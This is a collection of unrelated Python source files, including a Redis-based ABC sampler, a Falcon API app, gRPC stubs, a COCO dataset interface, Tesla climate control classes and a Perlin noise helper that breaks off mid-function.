return _one_key_batch('delete', bucket, keys)
def build_batch_stat(bucket, keys):
return _one_key_batch('stat', bucket, keys)
def _one_key_batch(operation, bucket, keys):
return [_build_op(operation, entry(bucket, key)) for key in keys]
def _two_key_batch(operation, source_bucket, key_pairs, target_bucket):
if target_bucket is None:
target_bucket = source_bucket
return [_build_op(operation, entry(source_bucket, k), entry(target_bucket, v)) for k, v in key_pairs.items()]
|
nilq/baby-python
|
python
|
import numpy as np
import pickle
from time import sleep
import cloudpickle
from redis import StrictRedis
from ...sampler import Sampler
from .cmd import (SSA, N_EVAL, N_ACC, N_REQ, ALL_ACCEPTED,
N_WORKER, QUEUE, MSG, START,
SLEEP_TIME, BATCH_SIZE)
from .redis_logging import logger
class RedisEvalParallelSampler(Sampler):
"""
Redis based low latency sampler.
This sampler is well performing in distributed environments.
It is usually faster than the
:class:`pyabc.sampler.DaskDistributedSampler` for
short model evaluation runtimes. The longer the model evaluation times,
the less the advantage becomes. It requires a running Redis server as
broker.
This sampler requires workers to be started via the command
``abc-redis-worker``.
An example call might look like
``abc-redis-worker --host=123.456.789.123 --runtime=2h``
to connect to a Redis server on IP ``123.456.789.123`` and to terminate
the worker after finishing the first population which ends after 2 hours
since worker start. So the actual runtime might be longer than 2h.
See ``abc-redis-worker --help`` for its options.
Use the command ``abc-redis-manager`` to retrieve info and stop the running
workers.
Start as many workers as you wish. Workers can be dynamically added
during the ABC run.
Parameters
----------
host: str, optional
IP address or name of the Redis server.
Default is "localhost".
port: int, optional
Port of the Redis server.
Default is 6379.
password: str, optional
Password for a protected server. Default is None (no protection).
batch_size: int, optional
Number of model evaluations the workers perform before contacting
the REDIS server. Defaults to 1. Increase this value if model
evaluation times are short or the number of workers is large
to reduce communication overhead.
"""
def __init__(self,
host: str = "localhost",
port: int = 6379,
password: str = None,
batch_size: int = 1):
super().__init__()
logger.debug(
f"Redis sampler: host={host} port={port}")
# handles the connection to the redis-server
self.redis = StrictRedis(host=host, port=port, password=password)
self.batch_size = batch_size
def n_worker(self):
"""
Get the number of connected workers.
Returns
-------
Number of workers connected.
"""
return self.redis.pubsub_numsub(MSG)[0][-1]
def sample_until_n_accepted(
self, n, simulate_one, max_eval=np.inf, all_accepted=False):
# open pipeline
pipeline = self.redis.pipeline()
# write initial values to pipeline
self.redis.set(
SSA, cloudpickle.dumps((simulate_one, self.sample_factory)))
pipeline.set(N_EVAL, 0)
pipeline.set(N_ACC, 0)
pipeline.set(N_REQ, n)
pipeline.set(ALL_ACCEPTED, int(all_accepted)) # encode as int
pipeline.set(N_WORKER, 0)
pipeline.set(BATCH_SIZE, self.batch_size)
# delete previous results
pipeline.delete(QUEUE)
# execute all commands
pipeline.execute()
id_results = []
# publish start message
self.redis.publish(MSG, START)
# wait until n acceptances
while len(id_results) < n:
# pop result from queue, block until one is available
dump = self.redis.blpop(QUEUE)[1]
# extract pickled object
particle_with_id = pickle.loads(dump)
# append to collected results
id_results.append(particle_with_id)
# wait until all workers done
while int(self.redis.get(N_WORKER).decode()) > 0:
sleep(SLEEP_TIME)
# make sure all results are collected
while self.redis.llen(QUEUE) > 0:
id_results.append(pickle.loads(self.redis.blpop(QUEUE)[1]))
# set total number of evaluations
self.nr_evaluations_ = int(self.redis.get(N_EVAL).decode())
# delete keys from pipeline
pipeline = self.redis.pipeline()
pipeline.delete(SSA)
pipeline.delete(N_EVAL)
pipeline.delete(N_ACC)
pipeline.delete(N_REQ)
pipeline.delete(ALL_ACCEPTED)
pipeline.delete(BATCH_SIZE)
pipeline.execute()
# avoid bias toward short running evaluations (for
# dynamic scheduling)
id_results.sort(key=lambda x: x[0])
id_results = id_results[:n]
results = [res[1] for res in id_results]
# create 1 to-be-returned sample from results
sample = self._create_empty_sample()
for j in range(n):
sample += results[j]
return sample
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
import falcon.asgi
import log
from app.api.common import base
from app.api.v1.auth import login
from app.api.v1.member import member
from app.api.v1.menu import menu
from app.api.v1.statistics import image
from app.api.v1.twitter import tweet
from app.api.v1.user import users
from app.database import db_session, init_session
from app.errors import AppError
from app.middleware import AuthHandler, JSONTranslator, DatabaseSessionManager, CORSMiddleware, WebsocketHandler
LOG = log.get_logger()
class App(falcon.asgi.App):
def __init__(self, *args, **kwargs):
super(App, self).__init__(*args, **kwargs)
LOG.info("API Server is starting")
self.add_route("/", base.BaseResource())
self.add_route("/v1/login", login.Auth())
self.add_route("/v1/statistics/count/image", image.Count())
self.add_route("/v1/menu/list", menu.Menu())
self.add_route("/v1/users", users.Collection())
self.add_route("/v1/users/{user_id}", users.Item())
self.add_route("/v1/users/self/login", users.Self())
self.add_route("/v1/member/list", member.List())
self.add_route("/v1/member/customes", member.Customes())
self.add_route("/v1/member/tags", member.Tags())
self.add_route("/v1/member/tweets", member.Tweets())
self.add_route("/v1/member/tweet/live", member.TweetLive())
self.add_route("/v1/member/youtube/channel/list", member.Collection())
self.add_route("/v1/twitter", tweet.TwitterList())
self.add_route("/v1/tweet/draws", tweet.Draws())
self.add_route("/v1/tweet/draws/live", tweet.DrawsLive())
self.add_route("/v1/tweet/custom/draws", tweet.CustomDraws())
self.add_route("/v1/tweet/custom/tags", tweet.CustomTags())
self.add_route("/v1/tweet/renewer/draws", tweet.RenewerDraws())
self.add_route("/v1/tweet/detail", tweet.TweetInfo())
self.add_route("/v1/tweet/ids", tweet.TweetIds())
self.add_route("/v1/tweet/member/{memeber_id}", users.Self())
self.add_route("/robots.txt", DenyCrawlers())
self.add_error_handler(AppError, AppError.handle)
class DenyCrawlers(object):
async def on_get(self, req, resp):
resp.body = "User-agent: *\nDisallow: /\n"
init_session()
middleware = [CORSMiddleware(), AuthHandler(), JSONTranslator(), DatabaseSessionManager(db_session), WebsocketHandler()]
application = App(middleware=middleware, cors_enable=True)
if __name__ == "__main__":
# from wsgiref import simple_server
#
# httpd = simple_server.make_server("127.0.0.1", 8000, application)
# httpd.serve_forever()
import uvicorn
uvicorn.run(application, host="0.0.0.0", port=8000, log_level="info", ws_ping_interval=10,
ws_ping_timeout=60 * 60, timeout_keep_alive=60 * 5)
|
nilq/baby-python
|
python
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from . import ParameterConstraintProvider_pb2 as ParameterConstraintProvider__pb2
class ParameterConstraintsProviderStub(object):
"""Feature: Parameter Constraint Provider
Allows a server to apply constraints on specific command parameters after design time. It is recommended to
specify
the constraints in the Feature Definitions whenever possible.
The constraints given by this Feature act as a logical AND to any constraints already defined in the Feature
Definition.
As an example: A constrained type has a Pattern Constraint, then the ParameterConstraintProvider specifies an
additional
Pattern Constraint - in this case the underlying SiLA Type has to follow BOTH Patterns defined.
The constrained can be retrieved by reading and subscribing to its dynamic property.
Example use-case: Loading and setting the positions a mobile robot can move to at runtime.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.Subscribe_ParametersConstraints = channel.unary_stream(
'/sila2.org.silastandard.core.parameterconstraintsprovider.v1.ParameterConstraintsProvider/Subscribe_ParametersConstraints',
request_serializer=ParameterConstraintProvider__pb2.Subscribe_ParametersConstraints_Parameters.SerializeToString,
response_deserializer=ParameterConstraintProvider__pb2.Subscribe_ParametersConstraints_Responses.FromString,
)
class ParameterConstraintsProviderServicer(object):
"""Feature: Parameter Constraint Provider
Allows a server to apply constraints on specific command parameters after design time. It is recommended to
specify
the constraints in the Feature Definitions whenever possible.
The constraints given by this Feature act as a logical AND to any constraints already defined in the Feature
Definition.
As an example: A constrained type has a Pattern Constraint, then the ParameterConstraintProvider specifies an
additional
Pattern Constraint - in this case the underlying SiLA Type has to follow BOTH Patterns defined.
The constrained can be retrieved by reading and subscribing to its dynamic property.
Example use-case: Loading and setting the positions a mobile robot can move to at runtime.
"""
def Subscribe_ParametersConstraints(self, request, context):
"""Parameters Constraints
Parameter Constraints that constrain any specified parameters within this structure
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_ParameterConstraintsProviderServicer_to_server(servicer, server):
rpc_method_handlers = {
'Subscribe_ParametersConstraints': grpc.unary_stream_rpc_method_handler(
servicer.Subscribe_ParametersConstraints,
request_deserializer=ParameterConstraintProvider__pb2.Subscribe_ParametersConstraints_Parameters.FromString,
response_serializer=ParameterConstraintProvider__pb2.Subscribe_ParametersConstraints_Responses.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'sila2.org.silastandard.core.parameterconstraintsprovider.v1.ParameterConstraintsProvider', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import csv
import numpy as np
import os
import sys
from observations.util import maybe_download_and_extract
def tobacco(path):
"""Households Tobacco Budget Share
a cross-section from 1995-96
*number of observations* : 2724
*observation* : individuals
*country* : Belgium
A dataframe containing :
occupation
a factor with levels (bluecol,whitecol,inactself), the last level
being inactive and self-employed
region
a factor with levels (flanders,wallon,brussels)
nkids
number of kids of more than two years old
nkids2
number of kids of less than two years old
nadults
number of adults in household
lnx
log of total expenditures
stobacco
budgetshare of tobacco
salcohol
budgetshare of alcohol
age
age in brackets (0-4)
National Institute of Statistics (NIS), Belgium.
Args:
path: str.
Path to directory which either stores file or otherwise file will
be downloaded and extracted there.
Filename is `tobacco.csv`.
Returns:
Tuple of np.ndarray `x_train` with 2724 rows and 9 columns and
dictionary `metadata` of column headers (feature names).
"""
import pandas as pd
path = os.path.expanduser(path)
filename = 'tobacco.csv'
if not os.path.exists(os.path.join(path, filename)):
url = 'http://dustintran.com/data/r/Ecdat/Tobacco.csv'
maybe_download_and_extract(path, url,
save_file_name='tobacco.csv',
resume=False)
data = pd.read_csv(os.path.join(path, filename), index_col=0,
parse_dates=True)
x_train = data.values
metadata = {'columns': data.columns}
return x_train, metadata
|
nilq/baby-python
|
python
|
from .wheel import Wheel
from .tree import SyncTree
|
nilq/baby-python
|
python
|
from .exceptions import ApigeeError
|
nilq/baby-python
|
python
|
"""Const for Velbus."""
DOMAIN = "velbus"
CONF_MEMO_TEXT = "memo_text"
SERVICE_SET_MEMO_TEXT = "set_memo_text"
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
from typing import List, NoReturn, Optional
from .signal import Signal
from .light import Light
from .tv import TV
class Appliance:
def __str__(self):
return f"{self.__class__.__name__}: {self.nickname}"
def __init__(self, data: dict) -> NoReturn:
self._set_member(data)
def update(self, data: dict) -> NoReturn:
self._set_member(data)
def _set_member(self, data: dict) -> NoReturn:
self.id: str = data["id"]
self.model: dict = data["model"]
self.nickname: str = data["nickname"]
self.name: str = data["nickname"] # alias for nickname
self.image: str = data["image"]
self.type: str = data["type"]
self.settings: dict = data["settings"]
self.aircon: dict = data["aircon"]
self.light: Light = Light(self.id, data["light"]) if self.type == "LIGHT" else None
self.tv: TV = TV(self.id, data["tv"]) if self.type == "TV" else None
self.signals: List = [Signal(**signal) for signal in data["signals"]]
def signal(self, name: str) -> (Optional[Signal], bool):
result: Optional[Signal] = next(filter(lambda x: name == x.name, self.signals), None)
return result, (result is not None)
|
nilq/baby-python
|
python
|
"""
COCO provides a simple way to use the coco data set thru a standardized interface. Implementing this
module can reduce complexity in the code for gathering and preparing "Coco data set" data. Besides that does the module
provide a standardized and simple interface which could be used with any data set containing image file locations and
bboxes.
#########
# USAGE #
#########
# set category filters filters
param_coco_cat_filters = [['person'], ['car'], ['bus'], ['truck']]
# set coco dataset locations
param_coco_annotation_file = '..\\COCO\\annotations_trainval2017\\annotations\\instances_train2017.json'
param_coco_img_dir = '..\\COCO\\annotations_trainval2017\\images\\train2017\\'
# load data set
coco = COCO.CocoDatasetInterface(param_coco_annotation_file, param_coco_img_dir)
data_x, data_y, data_dict_cat = coco.get_category_labeled_images(param_coco_cat_filters)
########################
# STANDARD DATA FORMAT #
########################
data_x is a list of image file locations [image_file_locations, ...]
data_y is a list with labels [[[bbox1_img1, bbox1_category_img1], [bbox2_img1, bbox2_category_img1], ...],
[[bbox1_img2, bbox1_category_img2], [bbox2_img2, bbox2_category_img2], ...],
...]
The bboxN_imgN variables specify the actual bboxes in format [x,y,width,height] where x and y are the left top corner
position of the bbox.
"""
from pycocotools.coco import COCO
from BasicLib.BasicFunctions import *
def show_coco_data_point(img, label_list, load_image_from_file=False):
"""
Display coco data set image and labels.
:param img: loaded image of image file location
:param label_list: labels
:param load_image_from_file: interprets 'img' as file location when True.
"""
image = img
if load_image_from_file:
image = load_image(img)
for bbox, category in label_list:
pt1 = (int(bbox[0]), int(bbox[1]))
pt2 = (int(pt1[0] + bbox[2]), int(pt1[1] + bbox[3]))
color = (np.random.random((1, 3)) * 255).tolist()[0]
cv2.rectangle(image, pt1, pt2, color, 2)
show_image(image)
class CocoDatasetInterface:
"""
This class forms a easy to use interface, meant to serve the data to a machine learning algorithm. Implementing this
class can reduce complexity in the code for gathering and preparing data. Besides that does the class provide a
standardized and simple interface which could be used with any data set containing image file locations and bboxes.
EXAMPLE:
from DataLibrary.COCO import *
coco_annotation_file = '..\\COCO\\annotations_trainval2017\\annotations\\instances_train2017.json'
coco_image_folder = '..\\COCO\\annotations_trainval2017\\images\\train2017\\'
coco = CocoDatasetInterface(coco_annotation_file, coco_image_folder)
images, labels, cat_dict = coco.get_category_labeled_images([['person'], ['car', 'bicycle', 'dog']])
coco.print_available_categories()
show_coco_data_point(images[0], labels[0], True)
"""
def __init__(self, coco_ann_file, coco_img_dir):
"""
Initialize class.
:param coco_ann_file: file location of the COCO data set annotation file
:param coco_img_dir: file location of the COCO data set image files
"""
# self.coco_annotation_file = coco_ann_file
self.coco_image_folder = coco_img_dir
self.coco = COCO(coco_ann_file)
self.categories = self.coco.loadCats(self.coco.getCatIds())
self.filtered_category_ids = None
def print_available_categories(self):
"""Prints all the Coco data set categories."""
print("ID: Category: Super Category:")
for cat in self.categories:
print("{:2} {:15} {}".format(cat['id'], cat['name'], cat['supercategory']))
print()
def get_images_ids(self, cat_nested_list):
"""
Returns list of image id's of images which meet the given category filter. These id's can be used to load
the image specifications.
:param cat_nested_list: is a list of lists, each inner list describing the items which has to be in the image
in the following format: [['car'], ['cat', 'horse']]
:return: list of image specifications, list of category id's
"""
img_id_list = []
total_cat_list = []
for cat_list in cat_nested_list:
cat_id_list = self.coco.getCatIds(catNms=cat_list)
total_cat_list += cat_id_list
img_id_list += self.coco.getImgIds(catIds=cat_id_list)
img_spec_list = self.coco.loadImgs(set(img_id_list))
total_cat_list = list(set(total_cat_list))
return img_spec_list, total_cat_list
def build_category_dict(self, cat_list):
"""
Creates two dictionaries linking the coco category id's to the normalized id's and the category names to their
normalized id's. These Dictionaries can be used to make id normalization and id to name linking easy.
Returns two dictionaries.:
cat_dict[0 .. n_categories] => cat_name
cat_translate_dict[coco_cat_id] => normalized_cat
:param cat_list: list of coco category id's
:return: cat_dict, cat_translate_dict
"""
cat_spec_list = self.coco.loadCats(cat_list)
cat_dict = {}
cat_translate_dict = {}
for cat_spec, normalized_id in zip(cat_spec_list, range(len(cat_spec_list))):
cat_dict[normalized_id] = cat_spec['name']
cat_translate_dict[cat_spec['id']] = normalized_id
return cat_dict, cat_translate_dict
def load_image_annotations(self, img_spec, cat_translate_dict, cat_list):
"""
Returns annotations list bboxes in format [[x,y,width,height], bbox_category_id], ...] for the given image_spec,
if bbox category is in cat_list.
:param img_spec: coco image specification
:param cat_translate_dict: cat_translate_dict[coco_cat_id] => normalized_cat
:param cat_list: list of coco category id's
:return: list bboxes in format [[x,y,width,height], bbox_category_id], ...]
"""
img_bboxes = []
ann_count_per_cat = [0] * len(cat_list)
ann_spec_list = self.coco.loadAnns(self.coco.getAnnIds(imgIds=img_spec['id']))
for ann_spec in ann_spec_list:
if ann_spec['category_id'] in cat_list and ann_spec['iscrowd'] == 0:
img_bboxes.append([ann_spec['bbox'], cat_translate_dict[ann_spec['category_id']]])
ann_count_per_cat[cat_translate_dict[ann_spec['category_id']]] += 1
return img_bboxes, ann_count_per_cat
def get_image_file_location(self, img_spec):
"""
Returns image file location
:param img_spec: coco image specification
:return: image file location
"""
return self.coco_image_folder + img_spec['file_name']
def get_category_labeled_images(self, cat_nested_list, verbose=True, print_func=print):
"""
This function forms the actual interface and output of the class, providing the coco data via a standardized and
simple format.
Returns a list with [image_file_locations, ...] a list with labels [[bounding boxes, bbox category], ...] and a
dictionary linking the category names to their id's. The images contain all the categories specified in the
'cat_nested_list' parameter.
:param cat_nested_list: is a list of lists, each inner list describing the items which has to be in the image.
:param verbose: print when True, a description of the selected data.
:param print_func: contains a function to print 'verbose' information with. Is the print function by default.
:return: a list with image file locations, a list with corresponding labels in format
[[[x,y,width,height], bbox_category_id], ...], [[x,y,width,height], bbox_category_id], ...], ...]
and a dictionary linking the category names to their id's.
example:
get_category_labeled_images([['person'], ['car', 'bicycle', 'dog']] ,verbose=False)
returns images with at least a person in it AND images with at least a car AND a bicycle AND a dog.
labels for each category are added to each image, so a image images with at least a car AND a bicycle AND a dog
might also contain labels of persons.
"""
img_spec_list, cat_list = self.get_images_ids(cat_nested_list)
cat_dict, cat_translate_dict = self.build_category_dict(cat_list)
# load images and annotations
x_data = []
y_data = []
total_ann_count = np.array([0] * len(cat_list))
for img_spec in img_spec_list:
image_file = self.get_image_file_location(img_spec)
image_bboxes, img_ann_count = self.load_image_annotations(img_spec, cat_translate_dict, cat_list)
total_ann_count += img_ann_count
x_data.append(image_file)
y_data.append(image_bboxes)
# display data details
if verbose:
print_func("Categories selected: {}".format(cat_dict))
print_func("Total images: {}".format(len(img_spec_list)))
for cat_id, cat_ann_count in zip(range(len(total_ann_count)), total_ann_count):
print_func("Annotations in \"{}\": {}".format(cat_dict[cat_id], cat_ann_count))
return x_data, y_data, cat_dict
def get_image_sizes(self, cat_nested_list):
"""
Returns a list of image sizes in pixels. If the same value for the 'cat_nested_list' parameter is used as with
the 'get_category_labeled_images' method, will the returned sizes match the data_x and data_y result lists of
the get_category_labeled_images method. So:
img_size_list[i] belongs to data_x[i] and data_y[i]
:param cat_nested_list: is a list of lists, each inner list describing the items which has to be in the image.
:return: list of image sizes in format [[width, height], ...]
"""
img_size_list = []
img_spec_list, cat_list = self.get_images_ids(cat_nested_list)
for img_spec in img_spec_list:
img_size_list.append([img_spec['width'], img_spec['height']])
return img_size_list
|
nilq/baby-python
|
python
|
import os
all = [i[:-3] for i in os.listdir(os.path.dirname(__file__)) if i.endswith(".py") and not i.startswith(".")]
|
nilq/baby-python
|
python
|
import sys
from datetime import datetime
from datapipe.configuracoes import Configuracoes
from datapipe.converters.tabela_hadoop import TabelaHadoop
from datapipe.datasources.db2 import Db2
from datapipe.utils.constantes import YAML_CONTINUA_ERRO
from datapipe.utils.log import Log, Niveis
class TabelaControleException(Exception):
pass
class TabelaControle:
def __init__(self, config: Configuracoes, nome_pipeline: str, bigsql: Db2, tabela: TabelaHadoop):
self.config = config
self.nome_pipeline = nome_pipeline
self.bigsql = bigsql
self.tabela = tabela
def registrar_erro(self, erro: Exception = None):
if erro:
self.tabela.mensagem_erro = str(erro)
Log.logar(erro, Niveis.ERROR)
self.salvar()
if self.tabela.continuar_em_erro:
Log.logar(
f"Erro na {self.nome_pipeline} da tabela {self.tabela.nome}. Tempo decorrido {self.tabela.timer}.", Niveis.ERROR)
return True
else:
raise TabelaControleException(f"Erro na {self.nome_pipeline} da tabela {self.tabela.nome}, processo FINALIZADO "
f"conforme a flag '{YAML_CONTINUA_ERRO}'.")
def iniciar(self):
Log.logar(
f"Iniciando {self.nome_pipeline} da tabela '{self.tabela.nome}'.", Niveis.INFO_DESTAQUE)
self.tabela.inicializar_temporizador()
self.bigsql.selecionar_schema(self.tabela.schema)
def finalizar(self):
if not self.tabela.mensagem_erro:
self.salvar()
registros = f"{int(self.tabela.qdte_registros):,}".replace(
",", ".")
Log.logar(
f"{self.nome_pipeline} da tabela {self.tabela.nome} finalizado em {self.tabela.timer}. {registros} registros gerados.", Niveis.INFO_DESTAQUE)
def salvar(self):
valores = {}
valores['JOB_CONFIG'] = self.config.nome_job
valores['PIPELINE'] = self.nome_pipeline
valores['DATA_PROC_CARGA'] = datetime.today().date()
valores['TABELA_PROC'] = self.tabela.nome_com_schema
valores['DATA_HORA_TABELA'] = datetime.today()
valores['QTD_REGISTROS'] = self.tabela.qdte_registros
if self.tabela.mensagem_erro:
valores['ERRO_BASE'] = str(self.tabela.mensagem_erro)[:520]
valores['TEMPO_TABELA'] = str(self.tabela.timer)
valores['KB_TRANSFERIDO'] = self.tabela.kb_transferido
schema = self.tabela.schema
tabela_controle = self.config.tabela_controle
try:
if "." in tabela_controle:
schema, tabela_controle = tabela_controle.split(".")
# TODO: conferir quantos arquivos físicos tem a tabela de controle configurada
# fazer isto no início do aplicativo, ao configurar log/zipar log
# > O que fazer: Recriar a tabela de controle com insert/from para reduzir o numero de arquivos
self.bigsql.salvar_registro(
tabela_controle, valores, schema=schema)
except Exception:
_, mensagem, _ = sys.exc_info()
if any(erro for erro in ['SQL0204N', 'SQL0206N'] if erro in str(mensagem)):
self.__reconfigurar_tabela_controle(
tabela_controle, schema, valores, mensagem)
else:
raise TabelaControleException(mensagem)
def __reconfigurar_tabela_controle(self, tabela_controle, schema, valores, mensagem_erro):
DDL_VERSAO_04 = {'JOB_CONFIG': 'VARCHAR(100)',
'PIPELINE': 'VARCHAR(100)',
'DATA_PROC_CARGA': 'DATE',
'TABELA_PROC': 'VARCHAR(255)',
'DATA_HORA_TABELA': 'TIMESTAMP',
'TEMPO_TABELA': 'VARCHAR(10)',
'QTD_REGISTROS': 'INTEGER',
'KB_TRANSFERIDO': 'VARCHAR(30)',
'ERRO_BASE': 'VARCHAR(520)'}
try:
if 'SQL0204N' in str(mensagem_erro):
if self.bigsql.criar_tabela(tabela_controle, DDL_VERSAO_04, schema=schema):
self.bigsql.salvar_registro(
tabela_controle, valores, schema=schema)
if 'SQL0206N' in str(mensagem_erro):
tabela_controle_backup = f'{tabela_controle}_VERSAO_03'
self.bigsql.renomear_tabela(
nome_antigo=tabela_controle, nome_novo=tabela_controle_backup, schema=schema)
if self.bigsql.criar_tabela(tabela_controle, DDL_VERSAO_04, schema=schema):
self.bigsql.executar_script(self.__carregar_migracao(
tabela_controle_backup, tabela_controle, schema))
self.bigsql.salvar_registro(
tabela_controle, valores, schema=schema)
else:
# TODO: Deu erro ao criar tabela, renomeia de volta para não perder o que já existe
self.bigsql.renomear_tabela(
nome_antigo=tabela_controle_backup, nome_novo=tabela_controle, schema=schema)
except Exception as ex:
raise TabelaControleException(ex)
def __carregar_migracao(self, nome_origem, nome_destino, schema):
script_versao04 = f"INSERT INTO {schema}.{nome_destino} " \
f"SELECT NULL AS JOB_CONFIG, NULL AS PIPELINE, DATA_PROC_CARGA, " \
f"TABELA_PROC, DATA_HORA_TABELA, TEMPO_TABELA, QTD_REGISTROS, " \
f"KB_TRANSFERIDO, ERRO_BASE " \
f"FROM {schema}.{nome_origem}"
return script_versao04
|
nilq/baby-python
|
python
|
import inspect
from enum import Enum
from typing import Callable, cast, TypeVar
from .._internal.default_container import get_default_container
from ..core import DependencyContainer
from ..providers import IndirectProvider
T = TypeVar('T', bound=type)
def implements(interface: type,
*,
state: Enum = None,
container: DependencyContainer = None) -> Callable[[T], T]:
"""
Class decorator declaring the underlying class as a (possible) implementation
to be used by Antidote when requested the specified interface.
For now, the underlying class needs to be decorated with @register.
Args:
interface: Interface implemented by the decorated class.
state: If multiple implementations exist for an interface, an
:py:class:`~enum.Enum` should be used to identify all the possible
states the application may be. Each state should be associated with
one implementation. At runtime Antidote will retrieve the state
(the :py:class:`~enum.Enum`) class to determine the current state.
container: :py:class:`~.core.container.DependencyContainer` from which
the dependencies should be retrieved. Defaults to the global
container if it is defined.
Returns:
The decorated class, unmodified.
"""
container = container or get_default_container()
def register_implementation(cls):
if not inspect.isclass(cls):
raise TypeError("implements must be applied on a class, "
"not a {}".format(type(cls)))
if not issubclass(cls, interface):
raise TypeError("{} does not implement {}.".format(cls, interface))
interface_provider = cast(IndirectProvider,
container.providers[IndirectProvider])
interface_provider.register(interface, cls, state)
return cls
return register_implementation
|
nilq/baby-python
|
python
|
# Exercícios Numpy-32
# *******************
import numpy as np
print(np.sqrt(16))
print(np.emath.sqrt(-16))#números complexos
|
nilq/baby-python
|
python
|
# SPDX-License-Identifier: Apache-2.0
"""
Python Package for controlling Tesla API.
For more details about this api, please refer to the documentation at
https://github.com/zabuldon/teslajsonpy
"""
import time
from typing import Text
from teslajsonpy.vehicle import VehicleDevice
class Climate(VehicleDevice):
"""Home-assistant class of HVAC for Tesla vehicles.
This is intended to be partially inherited by a Home-Assitant entity.
"""
def __init__(self, data, controller):
"""Initialize the environmental controls.
Vehicles have both a driver and passenger.
Parameters
----------
data : dict
The base state for a Tesla vehicle.
https://tesla-api.timdorr.com/vehicle/state/data
controller : teslajsonpy.Controller
The controller that controls updates to the Tesla API.
Returns
-------
None
"""
super().__init__(data, controller)
self.__is_auto_conditioning_on = False
self.__inside_temp = 0
self.__outside_temp = 0
self.__driver_temp_setting = 0
self.__passenger_temp_setting = 0
self.__is_climate_on = False
self.__fan_status = 0
self.__manual_update_time = 0
self.type = "HVAC (climate) system"
self.hass_type = "climate"
self.measurement = "C"
self.name = self._name()
self.uniq_name = self._uniq_name()
self.bin_type = 0x3
def is_hvac_enabled(self):
"""Return whether HVAC is running."""
return self.__is_climate_on
def get_current_temp(self):
"""Return vehicle inside temperature."""
return self.__inside_temp
def get_goal_temp(self):
"""Return driver set temperature."""
return self.__driver_temp_setting
def get_fan_status(self):
"""Return fan status."""
return self.__fan_status
async def async_update(self):
"""Update the HVAC state."""
await super().async_update()
data = self._controller.get_climate_params(self._id)
if data:
last_update = self._controller.get_last_update_time(self._id)
if last_update >= self.__manual_update_time:
self.__is_auto_conditioning_on = data["is_auto_conditioning_on"]
self.__is_climate_on = data["is_climate_on"]
self.__driver_temp_setting = (
data["driver_temp_setting"]
if data["driver_temp_setting"]
else self.__driver_temp_setting
)
self.__passenger_temp_setting = (
data["passenger_temp_setting"]
if data["passenger_temp_setting"]
else self.__passenger_temp_setting
)
self.__inside_temp = (
data["inside_temp"] if data["inside_temp"] else self.__inside_temp
)
self.__outside_temp = (
data["outside_temp"] if data["outside_temp"] else self.__outside_temp
)
self.__fan_status = data["fan_status"]
async def set_temperature(self, temp):
"""Set both the driver and passenger temperature to temp."""
temp = round(temp, 1)
self.__manual_update_time = time.time()
data = await self._controller.command(
self._id,
"set_temps",
{"driver_temp": temp, "passenger_temp": temp},
wake_if_asleep=True,
)
if data and data["response"]["result"]:
self.__driver_temp_setting = temp
self.__passenger_temp_setting = temp
async def set_status(self, enabled):
"""Enable or disable the HVAC."""
self.__manual_update_time = time.time()
if enabled:
data = await self._controller.command(
self._id, "auto_conditioning_start", wake_if_asleep=True
)
if data and data["response"]["result"]:
self.__is_auto_conditioning_on = True
self.__is_climate_on = True
else:
data = await self._controller.command(
self._id, "auto_conditioning_stop", wake_if_asleep=True
)
if data and data["response"]["result"]:
self.__is_auto_conditioning_on = False
self.__is_climate_on = False
await self.async_update()
@staticmethod
def has_battery():
"""Return whether the device has a battery."""
return False
class TempSensor(VehicleDevice):
"""Home-assistant class of temperature sensors for Tesla vehicles.
This is intended to be partially inherited by a Home-Assitant entity.
"""
def __init__(self, data, controller):
"""Initialize the temperature sensors and track in celsius.
Vehicles have both a driver and passenger.
Parameters
----------
data : dict
The base state for a Tesla vehicle.
https://tesla-api.timdorr.com/vehicle/state/data
controller : teslajsonpy.Controller
The controller that controls updates to the Tesla API.
Returns
-------
None
"""
super().__init__(data, controller)
self.__inside_temp = 0
self.__outside_temp = 0
self.type = "temperature sensor"
self.measurement = "C"
self.hass_type = "sensor"
self._device_class: Text = "temperature"
self.name = self._name()
self.uniq_name = self._uniq_name()
self.bin_type = 0x4
def get_inside_temp(self):
"""Get inside temperature."""
return self.__inside_temp
def get_outside_temp(self):
"""Get outside temperature."""
return self.__outside_temp
async def async_update(self):
"""Update the temperature."""
await super().async_update()
data = self._controller.get_climate_params(self._id)
if data:
self.__inside_temp = (
data["inside_temp"] if data["inside_temp"] else self.__inside_temp
)
self.__outside_temp = (
data["outside_temp"] if data["outside_temp"] else self.__outside_temp
)
@staticmethod
def has_battery():
"""Return whether the device has a battery."""
return False
@property
def device_class(self) -> Text:
"""Return the HA device class."""
return self._device_class
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
class NoiseUtils:
def __init__(self, imageLen,imageWid):
self.imageLen=imageLen
self.imageWid=imageWid
self.gradientNumber = 256
self.grid = [[]]
self.gradients = []
self.permutations = []
self.img = {}
self.__generateGradientVectors()
self.__normalizeGradientVectors()
self.__generatePermutationsTable()
def __generateGradientVectors(self):
for i in range(self.gradientNumber):
while True:
x, y = random.uniform(-1, 1), random.uniform(-1, 1)
if x * x + y * y < 1:
self.gradients.append([x, y])
break
def __normalizeGradientVectors(self):
for i in range(self.gradientNumber):
x, y = self.gradients[i][0], self.gradients[i][1]
length = math.sqrt(x * x + y * y)
self.gradients[i] = [x / length, y / length]
# The modern version of the Fisher-Yates shuffle
def __generatePermutationsTable(self):
self.permutations = [i for i in range(self.gradientNumber)]
for i in reversed(range(self.gradientNumber)):
j = random.randint(0, i)
self.permutations[i], self.permutations[j] = \
self.permutations[j], self.permutations[i]
def getGradientIndex(self, x, y):
return self.permutations[(x + self.permutations[y % self.gradientNumber]) % self.gradientNumber]
def perlinNoise(self, x, y):
qx0 = int(math.floor(x))
qx1 = qx0 + 1
qy0 = int(math.floor(y))
qy1 = qy0 + 1
q00 = self.getGradientIndex(qx0, qy0)
